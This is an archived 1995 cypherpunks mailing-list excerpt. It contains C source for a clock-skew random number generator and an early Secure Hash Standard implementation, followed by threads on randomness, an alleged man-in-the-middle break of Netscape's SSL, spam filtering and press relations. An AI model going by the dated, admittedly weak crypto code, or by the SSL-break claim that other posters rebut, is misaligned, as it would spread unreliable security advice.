X * a Sun Sparc-20 under SunOS 4.1.3 and on a P100 under BSDI 2.0.  You're
X * on your own elsewhere.
X */
X
#include <signal.h>
#include <setjmp.h>
#include <sys/time.h>
#include <math.h>
#include <stdio.h>
X
static jmp_buf env;
static unsigned count;
static unsigned ocount;
static unsigned buffer;
X
static int
tick()
{
X	struct itimerval it, oit;
X
X	timerclear(&it.it_interval);
X	it.it_value.tv_sec = 0;
X	it.it_value.tv_usec = 16665;
X	if (setitimer(ITIMER_REAL, &it, &oit) < 0)
X		perror("tick");
}
X
static void
interrupt()
{
X	if (count)
X		longjmp(env, 1);
X	(void) signal(SIGALRM, interrupt);
X	tick();
}
X
static unsigned long
roulette()
{
X
X	if (setjmp(env)) {
X		count ^= (count>>3) ^ (count>>6) ^ ocount;
X		count &= 0x7;
X		ocount=count;
X		buffer = (buffer<<3) ^ count;
X		return buffer;
X	}
X	(void) signal(SIGALRM, interrupt);
X	count = 0;
X	tick();
X	for (;;)
X		count++;	/* about 1 MHz on VAX 11/780 */
}
X
unsigned long
truerand()
{
X
X	count=0;
X	(void) roulette();
X	(void) roulette();
X	(void) roulette();
X	(void) roulette();
X	(void) roulette();
X	(void) roulette();
X	(void) roulette();
X	(void) roulette();
X	(void) roulette();
X	(void) roulette();
X	return roulette();
}
X
int
n_truerand(n)
int n;
{
X	int slop, v;
X
X	slop = 0x7FFFFFFF % n;
X	do {
X		v = truerand() >> 1;
X	} while (v <= slop);
X	return v % n;
}
X
X
X
SHAR_EOF
  $shar_touch -am 0930143395 'truerand.c' &&
  chmod 0644 'truerand.c' ||
  echo 'restore of truerand.c failed'
  shar_count="`wc -c < 'truerand.c'`"
  test 2886 -eq "$shar_count" ||
    echo "truerand.c: original size 2886, current size $shar_count"
fi
# ============= shs.c ==============
if test -f 'shs.c' && test X"$1" != X"-c"; then
  echo 'x - skipping shs.c (file already exists)'
else
  echo 'x - extracting shs.c (text)'
  sed 's/^X//' << 'SHAR_EOF' > 'shs.c' &&
/*
X * The authors of this software are Jim Reeds and Jack Lacy
X *              Copyright (c) 1992, 1994 by AT&T.
X * Permission to use, copy, and modify this software without fee
X * is hereby granted, provided that this entire notice is included in
X * all copies of any software which is or includes a copy or
X * modification of this software and in all copies of the supporting
X * documentation for such software.
X *
X * This software may be subject to United States export controls.
X *
X * THIS SOFTWARE IS BEING PROVIDED "AS IS", WITHOUT ANY EXPRESS OR IMPLIED
X * WARRANTY.  IN PARTICULAR, NEITHER THE AUTHORS NOR AT&T MAKE ANY
X * REPRESENTATION OR WARRANTY OF ANY KIND CONCERNING THE MERCHANTABILITY
X * OF THIS SOFTWARE OR ITS FITNESS FOR ANY PARTICULAR PURPOSE.
X */
X
/*
X * Secure Hash Standard
X * proposed NIST SHS
X * coded for byte strings: number of bits is a multiple of 8
X *
X * Copyright (c) 1992, 1994 AT&T Bell Laboratories
X * Coded by Jim Reeds 5 Feb 1992
X * Enhanced by Jack Lacy 1993, 1994
X */
X
/*
X * unsigned char * shs(char *s, int n);
X *
X * input:  
X *                s character array to be hashed
X *                n length of s in BYTES
X * output:
X *                return value: address of 5 unsigned longs holding hash
X *
X * machine dependencies:
X *                assumes a char is 8 bits
X */
X
/*
X * passes test on:
X *                gauss (vax)
X *                3k (cray)
X *                slepian (MIPS)
X *                bird (sparcstation II)
X */
X
#include <sys/types.h>
#include <stdio.h>
X
typedef struct {
X    long totalLength;
X    unsigned long h[5];
X    unsigned long w[80];
} SHS_CTX;
X
unsigned char *shs();
#ifdef SOLARIS2X
#define bzero(b, l)             memset(b, 0, l)
#define bcopy(s, d, l)          memcpy(d, s, l)
#define bcmp(s, d, l)           (memcmp(s, d, l)? 1 : 0)
#endif
X
static long nbits;
static unsigned long *h;
static unsigned long *w;
static void shs1();
/*
static void packl (unsigned long);
static void pack (unsigned char, unsigned char, unsigned char, unsigned char);
static void shs1(void);
static void opack(unsigned char);
*/
X
#define MASK        (unsigned long)0xffffffffL        /* in case more than 32 
bits per long */
X
/*
X * stick one byte into the current block; process the block when full
X */
static void opack(c)
X  unsigned char c;
{
X	int n32, nd32, shiftbits;
X	register unsigned long x, mask, y;
X	
X	nd32 = (int)(nbits >> 5);  /* nbits/32 */
X	n32 = (int)(nbits & 0x1f); /* nbits%32 */
X	shiftbits = 24-n32;
X	
X	x = (unsigned long)(c<<shiftbits);
X	mask = (unsigned long)(0xff << shiftbits);
X	mask = ~mask;
X	
X	y = w[nd32];
X	y = (y & mask) + x;
X	w[nd32] = y;
X	
X	nbits += 8;
X	if(nbits==512){
X		nbits = 0;
X		shs1();
X	}
}
X
static void pack(c0, c1, c2, c3)
X  unsigned char c0, c1, c2, c3;
{
X	int nd32;
X	
X	nd32 = (int)(nbits >> 5);
X	w[nd32] = (u_long)(((u_long)c0<<24) | ((u_long)c1<<16) | ((u_long)c2<<8) | 
(u_long)c3);
X	
X	nbits += 32;
X	if(nbits==512){
X		nbits = 0;
X		shs1();
X	}
}
X
/*
X * stick a 4 byte number into the current block
X */
static void
packl(x)
X  unsigned long x;
{
X	pack((unsigned char)(x>>24), (unsigned char)(x>>16),
X	     (unsigned char)(x>>8), (unsigned char)(x>>0));
}
X
/*
X * process one block
X */
static void
shs1()
{
X	unsigned long *wp;
X	unsigned long temp;
X	unsigned long A, B, C, D, E;
X	int t;
X	
#define S(n,x) (u_long)(((x)<<(n))|((MASK&(x))>>(32-(n))))
X	
X	wp = w;
X	t = 8;
X	do {
X		wp[16] = S(1, (u_long)(wp[13]^wp[8]^wp[2]^wp[0]));
X		wp[17] = S(1, (u_long)(wp[14]^wp[9]^wp[3]^wp[1]));
X		wp[18] = S(1, (u_long)(wp[15]^wp[10]^wp[4]^wp[2]));
X		wp[19] = S(1, (u_long)(wp[16]^wp[11]^wp[5]^wp[3]));
X		wp[20] = S(1, (u_long)(wp[17]^wp[12]^wp[6]^wp[4]));
X		wp[21] = S(1, (u_long)(wp[18]^wp[13]^wp[7]^wp[5]));
X		wp[22] = S(1, (u_long)(wp[19]^wp[14]^wp[8]^wp[6]));
X		wp[23] = S(1, (u_long)(wp[20]^wp[15]^wp[9]^wp[7]));
X		wp += 8;
X		t--;
X	} while (t > 0);
X	
X	A = h[0];
X	B = h[1];
X	C = h[2];
X	D = h[3];
X	E = h[4];
X	
X	t = 0;
X	while (t<20) {
X		temp = S(5,A) + E + w[t++];
X		temp += (unsigned long)0x5a827999L + ((B&C)|(D&~B));
X		E = D; D = C; C = S(30,B); B = A; A = temp;
X	}
X	while (t<40) {
X		temp = S(5,A) + E + w[t++];
X		temp += (unsigned long)0x6ed9eba1L + (B^C^D);
X		E = D; D = C; C = S(30,B); B = A; A = temp;
X	}
X	while (t<60) {
X		temp = S(5,A) + E + w[t++];
X		temp += (unsigned long)0x8f1bbcdcL + ((B&C)|(B&D)|(C&D));
X		E = D; D = C; C = S(30,B); B = A; A = temp;
X	}
X	while (t<80) {
X		temp = S(5,A) + E + w[t++];
X		temp += (unsigned long)0xca62c1d6L + (B^C^D);
X		E = D; D = C; C = S(30,B); B = A; A = temp;
X	}
X	h[0] = MASK&(h[0] + A);
X	h[1] = MASK&(h[1] + B);
X	h[2] = MASK&(h[2] + C);
X	h[3] = MASK&(h[3] + D);
X	h[4] = MASK&(h[4] + E);
}
X
#define CHARSTOLONG(wp,s,i) {*wp++ = (u_long)((((u_long)(s[i])&0xff)<<24)|(((u_
long)(s[i+1])&0xff)<<16)|(((u_long)(s[i+2])&0xff)<<8)|(u_long)(s[i+3]&0xff));}
X
X
void
shsInit(mdContext)
X  SHS_CTX *mdContext;
{
X	nbits = 0;
X	mdContext->h[0] = (unsigned long)0x67452301L;
X	mdContext->h[1] = (unsigned long)0xefcdab89L;
X	mdContext->h[2] = (unsigned long)0x98badcfeL;
X	mdContext->h[3] = (unsigned long)0x10325476L;
X	mdContext->h[4] = (unsigned long)0xc3d2e1f0L;
X	mdContext->totalLength = 0;
}
X
X
void
shsUpdate(mdContext, s, n)
X  SHS_CTX *mdContext;
X  unsigned char *s;
X  unsigned int n;
{
X	register unsigned long *wp;
X	long nn = n;
X	long i;
X	
X	w = mdContext->w;
X	h = mdContext->h;
X	mdContext->totalLength += n;
X	
X	nbits = 0;
X	n = n/(u_long)64;
X	wp = w;
X	
X	while(n>0){
X		CHARSTOLONG(wp,s,0);
X		CHARSTOLONG(wp,s,4);
X		CHARSTOLONG(wp,s,8);
X		CHARSTOLONG(wp,s,12);
X		CHARSTOLONG(wp,s,16);
X		CHARSTOLONG(wp,s,20);
X		CHARSTOLONG(wp,s,24);
X		CHARSTOLONG(wp,s,28);
X		CHARSTOLONG(wp,s,32);
X		CHARSTOLONG(wp,s,36);
X		CHARSTOLONG(wp,s,40);
X		CHARSTOLONG(wp,s,44);
X		CHARSTOLONG(wp,s,48);
X		CHARSTOLONG(wp,s,52);
X		CHARSTOLONG(wp,s,56);
X		CHARSTOLONG(wp,s,60);
X		n--;
X		wp = w;
X		s = (s + 64);
X		shs1();
X	}
X	i=nn%64;
X	while(i>3) {
X		CHARSTOLONG(wp,s,0);
X		s = (s + 4);
X		nbits += (u_long)32;
X		i -= 4;
X	}
X	while (i) {
X		opack((unsigned char)*s++);
X		i--;
X	}
}
X
void
shsFinal(mdContext)
X  SHS_CTX *mdContext;
{
X	long nn = mdContext->totalLength;
X	w = mdContext->w;
X	h = mdContext->h;
X	
X	opack(128);
X	while(nbits != 448)opack(0);
X	packl((unsigned long)(nn>>29));
X	packl((unsigned long)(nn<<3));
X	
X	/* if(nbits != 0)
X	   handle_exception(CRITICAL,"shsFinal(): nbits != 0\n");*/
}
X
unsigned char *
shs(s, n)
X  unsigned char *s;
X  long n;
{
X        SHS_CTX *mdContext;
X	static SHS_CTX mdC;
X	static unsigned char ret[20];
X	int i;
X	
X	mdContext = &mdC;
X
X	shsInit(mdContext);
X	shsUpdate(mdContext, s, n);
X	shsFinal(mdContext);
X	for (i=0; i<5; i++) {
X		ret[i*4] = (mdContext->h[i]>>24)&0xff;
X		ret[i*4+1] = (mdContext->h[i]>>16)&0xff;
X		ret[i*4+2] = (mdContext->h[i]>>8)&0xff;
X		ret[i*4+3] = (mdContext->h[i])&0xff;
X	}
X        
X	return ret;
}
X
/*int fread(char *, int, int, FILE *);*/
X
unsigned long *
fShsDigest(in)
X  FILE *in;
{
X	SHS_CTX *mdContext;
X	SHS_CTX mdC;
X	unsigned char buffer[1024];
X	long length, total;
X
X	mdContext = &mdC;
X	
X	bzero(buffer, 1024);
X
X	total = 0;
X	shsInit(mdContext);
X	while ((length = fread(buffer, 1, 1024, in)) != 0) {
X		total += length;
X		shsUpdate(mdContext, buffer, length);
X	}
X	shsFinal(mdContext);
X
X	return mdContext->h;
}
X
X
X
SHAR_EOF
  $shar_touch -am 0930142495 'shs.c' &&
  chmod 0644 'shs.c' ||
  echo 'restore of shs.c failed'
  shar_count="`wc -c < 'shs.c'`"
  test 7142 -eq "$shar_count" ||
    echo "shs.c: original size 7142, current size $shar_count"
fi
# ============= randtest.c ==============
if test -f 'randtest.c' && test X"$1" != X"-c"; then
  echo 'x - skipping randtest.c (file already exists)'
else
  echo 'x - extracting randtest.c (text)'
  sed 's/^X//' << 'SHAR_EOF' > 'randtest.c' &&
main(argc,argv)
int argc; char **argv;
{
X	int count;
X
X	if (argc==1)
X		count = 0;
X	else
X		count = atoi(argv[1]) + 1;
X	while (--count)
X		randbyte();
}
SHAR_EOF
  $shar_touch -am 0930150095 'randtest.c' &&
  chmod 0644 'randtest.c' ||
  echo 'restore of randtest.c failed'
  shar_count="`wc -c < 'randtest.c'`"
  test 149 -eq "$shar_count" ||
    echo "randtest.c: original size 149, current size $shar_count"
fi
exit 0






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Sat, 30 Sep 95 14:02:23 PDT
To: Matt Blaze <mab@crypto.com>
Subject: Re: my favorite random-numbers-in-software package (unix)
Message-ID: <199509302103.QAA26651@arnet.arn.net>
MIME-Version: 1.0
Content-Type: text/plain


At 03:46 PM 9/30/95 -0400, you wrote:

... <deletia> ...

>The basic idea is that you exploit randomness in the drift between
>the processor clock and the rate at which interval timer interrupts
>occur.  Such drift occurs even on idle processors.  randbyte() assumes
>that there's at least about .4 bits of "entropy" per interrupt, which is 
>(probably) a safe assumption on modern processors.  Randomness introduced
>by the OS (scheduler, etc.) can add to the overall entropy, but shouldn't
>be relied upon by itself.
>
>An advantage to this approach (using clock skew) is that the randomness
>doesn't depend on external events like user input, network traffic or
>processor load.  That makes it especially attractive for generating keys
>on unattended servers, e.g., for generating Diffie-Hellman exponents.
>Note, however, that very (very) slow and heavily-loaded processors may
>not provide enough cycles to the truerand process between interrupts for
>these assumptions to hold.  Also, all bets are off on processors that use
>a single clock source for both interval timing and CPU clocking.

Even with the exclusion of processors using single-source clocking for
interval and CPU timing, this would *seem* to be somewhat hazardous. Any two
clocking mechanisms that are 'mixed' are going to result in a number of
harmonics, or beat frequencies. While your system - at any given instant -
is quite likely to have a decent amount of randomness in it, I'd hazard a
guess that repetitive use would result in a discernible pattern. Even
something as 'coarse' as an interrupt timer has a finite range that it can
(must) operate in. Even if the CPU oscillator is based on a ceramic
resonator (nowhere near as stable/accurate as a crystal), the clock on it is
going to stay within +/-1% (worst case, for a *really* cheap oscillator) of
frequency, and drift not more than some number of Parts Per Million per
Period. Mixing the innate (relative) accuracy of two oscillators, and the
necessarily limited amount of drift that they're capable of, would seem to
result in an unacceptably low-yield source of 'real' randomness.

Of course, I'm kind of math-impaired when it comes to crypto, so my 20+
years of electronics (hardware) experience may not apply in this case :-)

Dave Merriman
This is a test (3 UUE lines) of the unconstitutional ITAR - 1/713th
of the PGP executable. See below for getting YOUR chunk! 
------------------ PGP.ZIP Part [015/713] -------------------
M=$<(&L`#*IPP",(G6(,,S,`P](<2RWU96XCW86/JBYV8A\D8@X'HB_9H#&\X
MX'PCUB.,13B"X8`R?^J-:UB.M_`U\>[#)BS&5$0C,Y#^1CS>1`\T1QTXX6!3
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
My web page: http://www.geopages.com/CapitolHill/1148






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbass@dmsd.com (John L. Bass)
Date: Sat, 30 Sep 95 15:14:10 PDT
To: cypherpunks@toad.com
Subject: Re: NetScape's dependence upon RSA down for the count!
Message-ID: <9509302213.AA11359@dmsd.com>
MIME-Version: 1.0
Content-Type: text/plain


Ok, several people have asked:

> Please explain to me how you can break SSL using the above method. I
> don't follow your line of thought. How could my fake www server
> intercept and redirect packets to netscape.com short of hacking a DNS
> server?

client ->       filter                          Client sends packet with K(c)
                filter ->       Server          filter forwards packet with K(f)                filter       <- Server          Server sends encrypts with K(f)
client       <- filter                          filter re-encrypts with K(c)

As the protocol progresses the filter also uses the master key,
and follows the renegotiation as the master key expires.


The existance of a working filter is enough to invalidate the security in
NetScape's claims.


hacking a DMS server is one way, spoofing a DNS reply to named is easier,
simply packaging the filter into a router/bridge close to the server
is more effective ... even if hacking the incoming phoneline/T1 line
to the server and inserting a very transparent bridge AKA a phone tap.

There is enough dollars to make the risks ... :)

John

BTW ... how do I join for these two list? Where are they archived to
catchup with past traffic?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Murray <ericm@lne.com>
Date: Sat, 30 Sep 95 16:22:50 PDT
To: jbass@dmsd.com (John L. Bass)
Subject: Re: NetScape's dependence upon RSA down for the count!
In-Reply-To: <9509302239.AA11407@dmsd.com>
Message-ID: <199509302336.QAA23456@slack.lne.com>
MIME-Version: 1.0
Content-Type: text/plain


 
> >   jbass@dmsd.com writes:
> >    > client ->       filter                          Client sends packet with K(c)
> >                 filter ->       Server          filter forwards packet with K(f)                filter       <- Server          Server sends encrypts with K(f)
> >    > client       <- filter                          filter re-encrypts with K(c)
> >    >
> >    > As the protocol progresses the filter also uses the master key,
> >    > and follows the renegotiation as the master key expires.
> > 
> > Yeah, but in order for this to work, the fake server needs to know
> > netscape.com's private (secret) key, no?
> > 
> > -jon
> 
> No ... the public part of any server private key is held by the filter
> and not returned to the client. The client only encrypts with public
> keys provided by the filter. The Server only encrypts with public keys
> provided by the filter. The filter has cleartext of the entire session.

What you have described is the classic 'man in the middle' attack.
Netscape claims that SSL V.3 is immune to the MITM attack in
appendix D.4 of the SSL V.3 spec. 

You will need to get the 'filter' (MITM) key signed by Verisign.
Or hack Verisign's server-key-signing key.


BTW your 'offer' is silly- this is not a trivial amount of work, and you
would not deserve any credit for coming up with so ordinary an
attack.  Write the code yourself, or pay the market rate for it.

-- 
Eric Murray  ericm@lne.com  ericm@motorcycle.com  http://www.lne.com/ericm
PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03  92 E8 AC E6 7E 27 29 AF



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbass@dmsd.com (John L. Bass)
Date: Sat, 30 Sep 95 15:40:11 PDT
To: cypherpunks@toad.com
Subject: Re: NetScape's dependence upon RSA down for the count!
Message-ID: <9509302239.AA11407@dmsd.com>
MIME-Version: 1.0
Content-Type: text/plain


>   jbass@dmsd.com writes:
>    > client ->       filter                          Client sends packet with K(c)
>                 filter ->       Server          filter forwards packet with K(f)                filter       <- Server          Server sends encrypts with K(f)
>    > client       <- filter                          filter re-encrypts with K(c)
>    >
>    > As the protocol progresses the filter also uses the master key,
>    > and follows the renegotiation as the master key expires.
> 
> Yeah, but in order for this to work, the fake server needs to know
> netscape.com's private (secret) key, no?
> 
> -jon

No ... the public part of any server private key is held by the filter
and not returned to the client. The client only encrypts with public
keys provided by the filter. The Server only encrypts with public keys
provided by the filter. The filter has cleartext of the entire session.

John





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Fri, 29 Sep 95 23:44:19 PDT
To: yusuf921@uidaho.edu (Syed Yusuf)
Subject: Re: Electronic junk mail
In-Reply-To: <Pine.HPP.3.91.950929164534.29284A-100000@harrier.csrv.uidaho.edu>
Message-ID: <199509300642.QAA28042@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello Syed Yusuf <yusuf921@uidaho.edu>
  and cypherpunks@toad.com

S.Y. wrote:
> I just recieved an electronic junkmail! 
...
> <root@goshawk.cserv.uidaho.edu>:
...
> > there is _nothing_ you can do to keep unwanted mail out of your mailbox,
>           ^^^^^^^^^!!!!
> Nothing? NOTHING??????
...

You could only accept signed e-mail. From a suitably defined set of
signators, of course.

If you write a script to do that for you, it would be useful to
others as well: parents could set it up for their innocent children
to guard them against all them bad guys on the net of which there
are exactly 98.3527% (no, that's not from [Rimm 95], I made it up).

The other thing would be that you would thereby force all your
correspondents to use PGP, which can't be such a bad thing, can it.


Yes, no, maybe?

Jiri
- --
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMGzmoSxV6mvvBgf5AQFRXQQAzP2Zv6reuIVyq9TdofXq5wJCz5aLdXou
yexGtkXSo8HKcHEmtF1DpcTZuzNs0zuXD92G3VAI+nCncAzfKKsLziSZ5hd93Dnm
huTC+wLm6XrnrjwS56h8F843bBE2jrEL1rnBN9UhEUD9VOyA1ncj7rb8Nap9Z0/V
885XUrREQTM=
=pOSV
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbass@dmsd.com (John L. Bass)
Date: Sat, 30 Sep 95 15:50:19 PDT
To: cypherpunks@toad.com
Subject: Re: NetScape's dependence upon RSA down for the count!
Message-ID: <9509302250.AA11430@dmsd.com>
MIME-Version: 1.0
Content-Type: text/plain



Ok ... one more time ... the filter has to replace the client/server
keys in the packet stream with it's own ...

John





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Don.Stephenson@Eng.Sun.COM (Don Stephenson)
Date: Sat, 30 Sep 95 17:15:57 PDT
To: jbass@dmsd.com
Subject: Re: NetScape's dependence upon RSA down for the count!
Message-ID: <9510010003.AA08494@icenine.Eng.Sun.COM>
MIME-Version: 1.0
Content-Type: text/plain



I haven't read the SSL spec for a while but my understanding was that 
the server passed it's public key to the client via a certificate 
signed by a mutually trusted certificate authority (i.e., Verisign).

How would the filter be able to forge such a certificate ?

- Don



> From jbass@dmsd.com Sat Sep 30 16:47:11 1995
> Date: Sat, 30 Sep 95 16:39:57 -0600
> From: jbass@dmsd.com (John L. Bass)
> To: www-security@ns2.rutgers.edu, cypherpunks@toad.com
> Subject: Re: NetScape's dependence upon RSA down for the count!
> 
> >   jbass@dmsd.com writes:
> >    > client ->       filter                          Client sends packet with K(c)
> >                 filter ->       Server          filter forwards packet with K(f)                filter       <- Server          Server sends encrypts with K(f)
> >    > client       <- filter                          filter re-encrypts with K(c)
> >    >
> >    > As the protocol progresses the filter also uses the master key,
> >    > and follows the renegotiation as the master key expires.
> > 
> > Yeah, but in order for this to work, the fake server needs to know
> > netscape.com's private (secret) key, no?
> > 
> > -jon
> 
> No ... the public part of any server private key is held by the filter
> and not returned to the client. The client only encrypts with public
> keys provided by the filter. The Server only encrypts with public keys
> provided by the filter. The filter has cleartext of the entire session.
> 
> John
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Don.Stephenson@Eng.Sun.COM (Don Stephenson)
Date: Sat, 30 Sep 95 17:33:59 PDT
To: jbass@dmsd.com
Subject: Re: NetScape's dependence upon RSA down for the count!
Message-ID: <9510010024.AA08498@icenine.Eng.Sun.COM>
MIME-Version: 1.0
Content-Type: text/plain



Yes, but the certificate that contains the public key of the server 
is digital signed by the certificate authority (CA).

To create such a certificate requires the secret key of the CA.

The public key of the CA is contained in the client software, which 
uses it to verify the validity of the server certificate.

- Don 


> From jbass@dmsd.com Sat Sep 30 17:15:36 1995
> Date: Sat, 30 Sep 95 16:50:05 -0600
> From: jbass@dmsd.com (John L. Bass)
> To: www-security@ns2.rutgers.edu, cypherpunks@toad.com
> Subject: Re: NetScape's dependence upon RSA down for the count!
> 
> 
> Ok ... one more time ... the filter has to replace the client/server
> keys in the packet stream with it's own ...
> 
> John
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Murray <ericm@lne.com>
Date: Sat, 30 Sep 95 17:11:58 PDT
To: jbass@dmsd.com (John L. Bass)
Subject: Re: NetScape's dependence upon RSA down for the count!
In-Reply-To: <9509302250.AA11430@dmsd.com>
Message-ID: <199510010025.RAA23630@slack.lne.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> 
> Ok ... one more time ... the filter has to replace the client/server
> keys in the packet stream with it's own ...


Where in SSL are these 'client/server keys' being sent?
A pointer to the page of the V3 spec where these keys are 
described will do.


-- 
Eric Murray  ericm@lne.com  ericm@motorcycle.com  http://www.lne.com/ericm
PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03  92 E8 AC E6 7E 27 29 AF



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Sat, 30 Sep 95 00:27:15 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: Cypherpunks Press release
In-Reply-To: <ac8d6cee030210045390@[205.199.118.202]>
Message-ID: <199509300726.RAA28172@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello cypherpunks@toad.com
  and tcmay@got.net (Timothy C. May)

tcmay@got.net (Timothy C. May) wrote:

> I guess you all know how much I hate this "who will be our spokesman?"
...

It seems to me that there are two viewpoints, 
  * a spokesman would be useful, and
  * a spokesman cannot be appointed due to lack of org

Which both seem to be true to me (they are *not* contradictory, only
the consequences are).


How about this idea: I remember once seeing some piece on some TV
personality (sorry, don't remember who, long time ago) who was
interviewed by fax. The jounalist sent questions to him, and some
time later received answers.

All that is needed then is someone with a fax machine to volunteer
to receive the fax, type it in and summarise the response afterwards
(noting points on which there was disagreement, and who disagreed
in what way).

...
> I've turned down several recent chances for interviews, for these reasons:
> 
> 1. I feel the people doing the work should be interviewed, not just someone
> who has some visibility (whatever mine might be). If PGP is the issue, then
...

Except PGP skill doesn't equal PR skill, not to mention that there
might be a geographical, time-zone or language barrier.

Sometimes having a separate PR person is useful, even if it does
tend to lead to the moronic statements salesdroids are infamous for.
With care, this problem can be minimized.

...
> 2. Location, location, location! The media foci are Washington, New York,
> and San Francisco, at least for our area of interest. Occasional forays
> into Austin, Miami, L.A., etc. This is where the taped interviews are done.
...

Not all PGP is done in those areas. You might want to have a SpokesPunk
near a focus to avoid having to get the people who actually do the work
to one of the abovementioned foci.

...
> The point? These "journalists" are tuned to looking for catchy quotes, all
...

It's in our interest to give them such catchy quotes, no?
Unless it would destroy us, of course...

...
> With no organization, no office, no coordination, we cannot "feed the media
> machine" the way it expects to be fed.

Only problem is, does anyone know of any other way to get our
ideas to be accepted by Joe Sixpack?

...
> Far better that journalists like Steven Levy and John Markoff subsribe to
> the list, or to condensations by people like Eric Blossom, and then deal
...

But then wouldn't that journalist act as a SpokesPunk?

Would you support such a jounalist writing about Cypherpunks?

What is the essential difference between a jounalist writing an
article and a volunteer writing a press release?

> Anarchy is part of our charm. More importantly, part of our theme.
...

A well-written press release could reflect that.

For example, some points could be presented in two ways (perhaps
even contradictory) with full attribution of who wrote which view.

Those who oppose the whole idea could be noted in the press release :-)
Unless they object to that in which case they wouldn't be.


Yes, No, Maybe? Definite Maybe?

Jiri
- --
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMGzxJCxV6mvvBgf5AQF1owP9GwgbLK1/HCq+iRKqw42q5Y6Kzbtmyda1
YJwblubOWacbVER2aURAN3m51MCsTXreuLxSbcm9dgP4Zk2071yZFGa7D2OF7dtS
pkfa5k1pn2v1EYplTvgJhAdTVJGqJ3sPc1VCIIWaRazeJjS0zA4d9rHmJWXb5DXp
6Hz8CbDw4UA=
=th3o
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Sat, 30 Sep 95 15:50:27 PDT
To: "David K. Merriman" <merriman@arn.net>
Subject: Re: my favorite random-numbers-in-software package (unix)
In-Reply-To: <199509302103.QAA26651@arnet.arn.net>
Message-ID: <199509302301.TAA16936@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain


David Merriman writes:
> 
> Even with the exclusion of processors using single-source clocking for
> interval and CPU timing, this would *seem* to be somewhat hazardous. Any two
> clocking mechanisms that are 'mixed' are going to result in a number of
> harmonics, or beat frequencies. While your system - at any given instant -
> is quite likely to have a decent amount of randomness in it, I'd hazard a
> guess that repetitive use would result in a discernible pattern. Even
> something as 'coarse' as an interrupt timer has a finite range that it can
> (must) operate in. Even if the CPU oscillator is based on a ceramic
> resonator (nowhere near as stable/accurate as a crystal), the clock on it is
> going to stay within +/-1% (worst case, for a *really* cheap oscillator) of
> frequency, and drift not more than some number of Parts Per Million per
> Period. Mixing the innate (relative) accuracy of two oscillators, and the
> necessarily limited amount of drift that they're capable of, would seem to
> result in an unacceptably low-yield source of 'real' randomness.

I'm the first to agree that, in the absence of some good analysis of
the exact platform on which it is run, the clock-skew approach is built
on a very weak foundation.  But informal (and completely ad hoc)
analysis suggests that it might be more promising than you'd first
expect.  While the drift between the two clocks is likely only very small,
we're also not asking for very much; we need less than one bit
worth of uncertainty in an accumulator that burns processor cycles until
some (smaller) number of clock intervals have occurred.  (The OS might
also not give you all those cycles, adding to the uncertainty, although
you can't really count on this in the case of high-priority processes or
unloaded machines).

I (and a few others) have run some tests on this on a couple of (bare)
processors in an effort to find artificats of the clock periods in the
low-order bits of the counter, with no success.  This, of course, hardly
constitutes a "proof".

I'd love to see some good analysis of this technique, particularly with
an eye toward quantifying the quality and bandwidth of the output and
finding better parameters for the minimum interval rate, etc.

-matt

PS there are other "magic" techniques for getting randomness without special
hardware that are proposed from time to time but that never really undergo
enough analysis for my taste.  For example, at CRYPTO '94 (or maybe '93)
there was an interesting proposal to use software to measure the air flow
inside the disk drive.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Sat, 30 Sep 95 19:20:06 PDT
To: Eric Murray <ericm@lne.com>
Subject: Re: NetScape's dependence upon RSA down for the count!
In-Reply-To: <199509302336.QAA23456@slack.lne.com>
Message-ID: <Pine.SOL.3.91.950930185650.4661A-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 30 Sep 1995, Eric Murray wrote:

> What you have described is the classic 'man in the middle' attack.
> Netscape claims that SSL V.3 is immune to the MITM attack in
> appendix D.4 of the SSL V.3 spec. 

I think you're misunderstanding the claim somewhat - what D.4 does is warn 
implementors that they should perform  some means of associating 
hostnames and certificates. You can't just use SSL out of the box without 
doing anything in the application to check. 

My currently recommended approach is to enforce the verisign requirement 
that all valid hostnames for the server be included in the certificate as 
CN values. This allows the check to be made below the application layer. 
